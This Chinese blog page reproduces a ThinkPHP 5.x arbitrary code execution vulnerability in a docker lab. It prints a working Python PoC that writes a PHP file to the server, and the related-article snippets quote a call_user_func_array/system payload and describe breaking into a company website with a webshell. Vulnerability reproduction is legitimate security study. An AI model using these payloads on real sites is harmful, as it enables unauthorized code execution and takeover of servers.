thinkphp恶意写入php代码,ThinkPHP任意代码执行漏洞复现

最新推荐文章于 2023-07-24 11:41:56 发布
最新推荐文章于 2023-07-24 11:41:56 发布
阅读量289 收藏
点赞数
文章标签: thinkphp恶意写入php代码

ThinkPHP任意代码执行漏洞复现

一、漏洞描述

由于 ThinkPHP 框架对控制器名没有进行足够严格的检测,导致在没有开启强制路由的情况下,攻击者可以在服务端执行任意恶意代码。

经过本地复现确认,攻击者仅仅通过一个 HTTP GET 请求,就可以完成漏洞的利用,执行任意代码。以执行 phpinfo() 为例。

二、影响范围

ThinkPHP 5.0.x < 5.0.23

ThinkPHP 5.1.x < 5.1.31

三、漏洞复现

利用docker搭建好环境启动

访问192.168.1.93:8181

构造poc:

#!/usr/bin/env python

#coding:utf-8

import sys

import requests

def tpgetshell(url):

headers={

"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",

"Accept-Encoding": "gzip, deflate",

"Accept-Language": "zh-CN,zh;q=0.9",

"Cache-Control": "max-age=0",

"Connection": "keep-alive",

"Upgrade-Insecure-Requests": "1",

"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36",

}

r = requests.get(url=url,headers=headers)

print ("phpinfo写入成功")

print ("shell url:"+sys.argv[1] + "/phpinfo.php")

if __name__ == '__main__':

if len(sys.argv) != 2:

print ("python http://www.xxx.com/")

else:

poc = "/?s=index/\\think\\template\\driver\\file/write?cacheFile=phpinfo.php&content=%3C?php%20phpinfo();?%3E"

url = sys.argv[1] + poc

tpgetshell(url)

测试:

weixin_39941859
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp恶意写入php代码,漏洞报告 | ThinkPHP配置不当可导致远程代码执行
weixin_30653101的博客
04-08 380
ThinkPHP配置不当可导致远程代码执行漏洞分析报告1. 漏洞描述ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。2. 漏洞危害攻击者可通过该漏洞获取网站的控制权限,可修改页面,导致数据泄漏等...
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
实战:通过tp5.0.5漏洞入侵企业网站
最新发布
weixin_44763740的博客
07-24 533
下一步就是使用蚁剑连接webshell,看到这里,大家都以为可以直接getshell了吧,但是命运就是这么捉弄人,明明已经将木马包含在日志中,并且有绝对路径,相关函数也没有禁用,这一切看起来都是那么顺利,可就是连接失败。后来我又尝试换冰蝎马,但是因上传做了字符串限制,只能用最简单的一句话木马,其余多一个字符串都会被截掉,那么会不会是编码器的问题呢?以上可知,木马已存在,且路径正确,那一定是连接出问题了。我是身上有点执念的,为了梦想也好,目标也罢,有时候,你不去较劲儿,永远不知道自己能改变什么。
关于网站被挂马ThinkPHP网站被劫持问题“define(‘Viv, bebegim.‘,‘Denzel-你的英雄‘)”
一个点的博客
08-21 4000
近日网站被挂马了,首页被恶意篡改,浏览器进入跳转菠菜页面,而且只要一个网站被挂马,基本一个服务器都无法幸免,所以觉得这些人为了流量不择手段非常可恨,但当自己深入了解并执行了木马文件之后,才发现,原来别人已经无比的宽容,手下留情,下面带大家看下那些挂马的人是怎么手下留情的,让你知道下挂马的危害与恐怖程度~~~废话不多说直接进入主题 一、挂马文件 网站被挂马最主要的表现就是首页被修改,黑客通过篡改首页文件并判断进入页面方式,从而截取用户流量,如:直接输入网址进入,看到的是被篡改后的首页静态html页面.
后台被入侵了解决详情
weixin_67757219的博客
02-02 381
首先我们来确认下客户的服务器,使用的是linux centos系统,网站采用的PHP语言开发,数据库类型是mysql,使用开源的thinkphp架构二次开发而成,服务器配置是16核,32G内存,带宽100M独享,使用的是阿里云ECS服务器,在被黑客攻击之前,收到过阿里云的短信,提示服务器在异地登录,我们小蚁安全技术跟客户对接了阿里云的账号密码以及服务器的IP,SSH端口,root账号密码。记录一下我们整个的安全处理过程,教大家该如何防止服务器被攻击,如何解决服务器被入侵的问题。
MSF复现Thinkphp漏洞
weixin_51151498的博客
02-09 296
MSF复现漏洞
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 984
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
基于ThinkPHP5开发的漂亮通用后台全权限管理系统.zip
06-12
基于tp5.0+漂亮通用后台+全权限管理系统,基于tp5.0+漂亮通用后台+全权限管理系统,基于tp5.0+漂亮通用后台+全权限管理系统。
[thinkPHP5项目实战_07]引入后台管理页面
骑着代码去流浪
08-13 6575
后台页面的引入与前台页面的引入类似。 1.后台页面资源布置 1.1.后台首页位置 后台管理应作为一个单独的模块存放,在application中新建admin文件夹,用于存放后台管理的控制器和视图: 其中admin中的index.html为后台首页。 1.2.后台页面静态资源存放位置 在puclic/static文件夹新建一个admin文件,放入后台页面的静态资源: 2
ThinkPHP 远程命令执行漏洞复现(GetShell) 5.0.22版本
weixin_44133711的博客
05-11 1289
漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞漏洞危害 攻击者可通过该漏洞获取网站的...
记录一次基于ThinkPHP网站被入侵到溯源的过程
DYBOY-程序开发&网络安全
02-18 2652
昨天晚上,正准备入睡,朋友突然发消息说他的网站被黑客攻击了,首页内容被篡改,于是我开始了紧急的修复工作 知道这个情况后,立即翻身起来,让朋友发给我必要的信息,把网站的日志下载到本地,因为网站本身的访问量不是很大,所以直接使用 notepad++ 来手动分析。 0x01 下载必要文件 首先将日志文件、现在网站空间的源码以及之前的网站备份下载到本地,这一步是为了比较分析。 0x02 日志分析 从网...
ThinkPHP3.2 框架sql注入漏洞分析(2018-08-23)
Fly_鹏程万里
12-11 6263
0x00 前言 北京时间 2018年8月23号11:25分 星期四,tp团队对于已经停止更新的thinkphp 3系列进行了一处安全更新,经过分析,此次更新修正了由于select(),find(),delete()方法可能会传入数组类型数据产生的多个sql注入隐患。 0x01 漏洞复现 下载源码: git clone https://github.com/top-think/thinkp...
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3625
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
困扰多年的THINKPHP隐藏后台.php问题终于解决了!
低着头走着...
03-08 6452
前台隐藏index.php很简单. 官方就是api说明文档就有.htaccess的规则.                          RewriteEngine on                        RewriteCond %{REQUEST_FILENAME} !-d                        RewriteCond %{REQUEST_
Thinkphp安全漏洞入侵 1
weixin_34352449的博客
05-18 496
下面是来自sebug网站的漏洞信息:http://sebug.net/vuldb/ssvid-60054 不过该网站只是给了个测试的方法,并没有给出详细的入侵方式如: 通过使用 http://localhost/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D可以获取Thinkphp的版本号 ...
thinkphp 2.x 任意代码执行漏洞
06-28
这个问题是关于ThinkPHP 2.x是否存在代码漏洞的。据我所知,目前没有任何官方宣布过该版本存在漏洞的消息。但是任何一个应用程序都有可能存在漏洞,因此在使用任何版本的框架时都需要小心谨慎,并始终保持最新版本的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值